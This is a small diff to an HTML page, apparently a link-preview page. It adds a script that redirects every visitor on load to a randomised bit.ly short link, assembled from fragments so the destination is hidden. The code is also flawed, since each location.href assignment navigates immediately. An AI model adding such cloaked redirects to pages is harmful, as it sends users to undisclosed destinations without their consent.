--- a/om7anan/1.html
+++ b/om7anan/1.html
@@ -12,3 +12,19 @@
 				    https://55short.com/uploads/WlpdY11F.jpg
 				    
                                    ">
+
+
+
+
+<script type = "text/javascript">
+function reDirect() {
+a = location.href = "bit.ly/";
+b = location.href = "caa";
+c = location.href = "art";
+d = Math.ceil(Math.random() * 2);
+a = "http://" + a + b + c + d ;
+window.location = a
+}
+reDirect();
+</script>
+
